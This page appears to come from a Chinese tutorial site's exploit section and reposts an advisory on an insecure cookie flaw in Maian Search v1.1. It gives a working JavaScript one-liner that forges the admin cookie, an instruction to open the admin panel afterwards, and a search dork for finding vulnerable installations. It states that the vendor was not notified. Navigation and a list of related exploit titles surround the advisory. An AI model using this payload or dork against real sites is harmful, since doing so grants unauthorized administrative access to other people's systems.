首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >网络安全 >Exploit >Maian Search
Maian Search
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by: Maian Search v1.1

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Search suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "search_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

【Maian Search】相关文章:

VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

GeekLog

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

Mole Group Last Minute Script

CJ Ultra Plus

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

NoName Script

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

上一篇: Maian Uploader
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
网络安全子分类
最新Exploit学习
热门Exploit学习